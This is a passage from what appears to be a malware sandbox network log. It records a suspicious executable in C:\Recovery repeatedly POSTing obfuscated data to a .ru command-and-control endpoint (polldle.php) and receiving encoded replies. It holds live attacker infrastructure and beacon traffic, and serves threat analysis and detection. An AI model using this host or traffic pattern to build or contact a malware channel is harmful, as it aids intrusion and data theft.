                                                                                Jan 11, 2025 23:33:38.817344904 CET | 2500 | OUT | Data Raw: 5d 5b 54 50 5f 43 5f 5f 54 5d 55 5a 50 5c 59 5e 50 50 5a 5c 57 55 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TP_C__T]UZP\Y^PPZ\WUP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B-U6%;%T53Y1S7/=^8(+[(4&#!-8"2#\(%#X'/\/<
                                                                                Jan 11, 2025 23:33:38.936810017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:39.242655993 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNCaZ%2FGuNBh0XpbfJdbQNnsorRxbr6BdmThcpfPRBIZSYwhKkm862LWgwuam%2BWygVsR02jnlR%2FsrW2b7zEdQRjiBaZ%2BalZmRFbXLOI77K3DGs%2BoBXfEC0V0B%2BO%2FwOfY1Qwe8uIUi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea20a5872b7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4811&min_rtt=1999&rtt_var=6374&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=59594&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                56 | 192.168.2.4 | 50011 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:39.376337051 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:39.723578930 CET | 2504 | OUT | Data Raw: 5d 5a 54 54 5a 49 5a 5a 54 5d 55 5a 50 5d 59 5a 50 54 5a 5b 57 52 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTTZIZZT]UZP]YZPTZ[WRP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#*B221)]3: ?>-8+(?$1 1,4$[5']+#X'/\/
                                                                                Jan 11, 2025 23:33:39.832396030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:40.046155930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:40.085486889 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNEpoFx9%2B9m9MZ5XD69C%2FoRwjS2TRI3QsI5oIf7CsPLyX9LkLVcr8tJ1noBLRc4Lq7QEsh%2BmcCbeZYdW12wNPOdFzky8JH4NPoFBB3mfHYq5NbTpxs8H5UIMRVZGaTBNpyu9EFel"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea7ad9743f8-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3519&min_rtt=1721&rtt_var=4241&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=90649&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:40.175065994 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                57 | 192.168.2.4 | 50017 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:40.507966042 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:40.864377975 CET | 2504 | OUT | Data Raw: 58 5d 54 5f 5f 42 5a 5d 54 5d 55 5a 50 59 59 5b 50 52 5a 53 57 51 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]T__BZ]T]UZPYY[PRZSWQPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-6B1+,]&16'&#/%-($),<%3,'8#!'X<#X'/\/0
                                                                                Jan 11, 2025 23:33:40.952601910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:41.225157976 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmoVnSl346pGD7qA8i5%2FDbgoOnPeThVYXmJq%2BgPPefGHQ8Yz7d2DeZsK3rLwU6VFzdLnYDs3p7HL297qZzBMzbo3iiYZ9BIl%2Fy8BYaFM8pe5B1f1fofbbs4MWdi8Jqk%2BHP6eUEyC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eaebe7bc3fd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1502&rtt_var=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=290489&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                58 | 192.168.2.4 | 50023 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:41.353454113 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:41.707937956 CET | 2496 | OUT | Data Raw: 5d 5e 51 57 5a 42 5f 5b 54 5d 55 5a 50 5c 59 58 50 57 5a 58 57 5d 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QWZB_[T]UZP\YXPWZXW]PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@93!18$\11*$Y)7-+(Y013%-$\6 *%#X'/\/,
                                                                                Jan 11, 2025 23:33:41.815372944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:42.077035904 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZcKd4b%2BLYfc5yug8k0S%2BsF91tF7wW7M8NSWuQVwJMVJ3qIer11xC16MNrEv8RKJYGzLmL106Fkyg3%2FyAESBruuSWnpeGTDkxoN0owLLfSjuu5W0VFxvGcUNSKFCqhL6ksBosXT4"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eb41d358c17-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4051&min_rtt=2188&rtt_var=4547&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=85395&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                59 | 192.168.2.4 | 50032 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:42.210012913 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:42.567437887 CET | 2500 | OUT | Data Raw: 58 5d 54 5f 5a 48 5a 5b 54 5d 55 5a 50 5c 59 5e 50 5c 5a 5e 57 5c 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]T_ZHZ[T]UZP\Y^P\Z^W\P^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 93!&8[%:01#,_87[??+&#%.446/*%#X'/\/<
                                                                                Jan 11, 2025 23:33:42.658232927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:42.930460930 CET | 791 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWJLhzSWRPJmp0VWWYQca0zpHgGK9fv6XwwOCAVvHXhrtJXlG5NOuo4ljruCq%2B9K1Dd8Kdyuota7zPZfzNmrZA5o9uxu%2FGiWvicYR02yv7hxAGTFVfoLo2Ka4Kf%2F7SdYq4TdM0QW"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eb95da4c46b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1549&rtt_var=1003&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=450895&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:43.017524958 CET | 14 | IN | Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                60 | 192.168.2.4 | 50040 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:43.160162926 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:43.504868031 CET | 2504 | OUT | Data Raw: 5d 5d 54 50 5a 46 5f 5a 54 5d 55 5a 50 5b 59 51 50 5c 5a 5a 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TPZF_ZT]UZP[YQP\ZZWWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 5%?%T>32#%/(;+#U% ):'#!8<5#X'/\/
                                                                                Jan 11, 2025 23:33:43.604284048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:43.852154016 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:43 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPgM%2Fvbtu%2Bg%2BOu1N555T2Nbo4mpYh5qQDKz1Hobgc3%2BGiwEtxtC0gmlVBZVbXThUTYb2NGh%2BBwCSch8jr%2FyuzISMr3Szzh3HI0fIu%2BzssYvP9srUwNdEl8FWL5jMn3o641d%2FagCL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ebf481f78d0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8630&min_rtt=2060&rtt_var=13914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26726&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                61 | 192.168.2.4 | 50046 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:43.980196953 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:44.333153963 CET | 2504 | OUT | Data Raw: 5d 59 54 54 5f 46 5f 5b 54 5d 55 5a 50 58 59 5a 50 57 5a 58 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTT_F_[T]UZPXYZPWZXWUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9:@%;<$"6$<5R",=/++T%W-#2X?#X'/\/4
                                                                                Jan 11, 2025 23:33:44.437129974 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                62 | 192.168.2.4 | 50047 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:43.980236053 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:44.333290100 CET | 1620 | OUT | Data Raw: 5d 5c 51 52 5f 42 5f 5c 54 5d 55 5a 50 54 59 5a 50 5c 5a 5b 57 57 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QR_B_\T]UZPTYZP\Z[WWP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :*$+$Z&">%?%T#&/ ((&.S.'!+?%#X'/\/
                                                                                Jan 11, 2025 23:33:44.442790985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:44.601043940 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:44 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ip6jPlWJPtG%2Btgsa3fbL7kYNZ9PSxvgnF8xRmWixTKuoj3tg8YtjZAlXnsVGvqCzxXRYG98VNM%2FdRx7zYGqVkahPuLB%2F8cXfAXM2V579%2F9V5FNYE2GCgHi%2Fn5pgkfrhTblI1fb%2FV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ec47923f3bb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3480&min_rtt=1652&rtt_var=4275&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=89697&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 53 30 1a 38 13 29 5f 2c 02 2e 06 3f 12 2c 21 3b 07 29 32 2a 5a 20 5f 3f 01 32 0c 28 57 2b 2a 31 06 3f 03 27 1f 34 10 3e 54 31 39 23 46 0c 1d 22 58 29 3c 2c 57 26 02 34 58 2b 0a 29 00 32 22 05 1b 28 37 3c 0d 3d 39 21 5c 35 3f 3d 0a 28 32 25 50 28 36 2a 19 2c 0f 30 02 31 00 2e 51 0f 16 21 1d 21 1f 30 59 34 04 3b 15 26 1e 2c 02 3f 1d 27 05 26 2a 2f 0a 2b 33 2d 00 2b 0c 20 57 33 2d 34 08 31 11 2d 04 3e 3a 20 0e 2b 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.S08)_,.?,!;)2*Z _?2(W+*1?'4>T19#F"X)<,W&4X+)2"(7<=9!\5?=(2%P(6*,01.Q!!0Y4;&,?'&*/+3-+ W3-41->: +;$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                63 | 192.168.2.4 | 50053 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:44.733339071 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:45.091154099 CET | 2504 | OUT | Data Raw: 5d 59 54 53 5f 41 5a 5d 54 5d 55 5a 50 54 59 5f 50 52 5a 5b 57 56 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTS_AZ]T]UZPTY_PRZ[WVP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.#-&2%$/%4=Y,#_+?W1:$(^#!$(#X'/\/
                                                                                Jan 11, 2025 23:33:45.198509932 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:45.387228966 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:45 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYhOqx7yCLI2qO8G9%2FjuIVp7cnsQsuEN6XJwNAm180xqWPUHeMgNE%2BKcPiksEYIBGpCwdrj5WkBh8LsgAt79y5WJ8bNQvgsqfl12%2BMjlOdVSXgVfZzcwbDiQ0Joag%2FTesvVdgZ1t"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ec93fd78cb3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5102&min_rtt=1977&rtt_var=6993&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=54108&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                64 | 192.168.2.4 | 50057 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:45.624691010 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:45.973664045 CET | 2500 | OUT | Data Raw: 5d 5b 51 55 5a 43 5a 5d 54 5d 55 5a 50 5c 59 5f 50 50 5a 53 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QUZCZ]T]UZP\Y_PPZSWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C9 .&83&!=0,-U"?9X,;#+U13)-7<!#+5#X'/\/
                                                                                Jan 11, 2025 23:33:46.072381020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:46.308233976 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:46 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
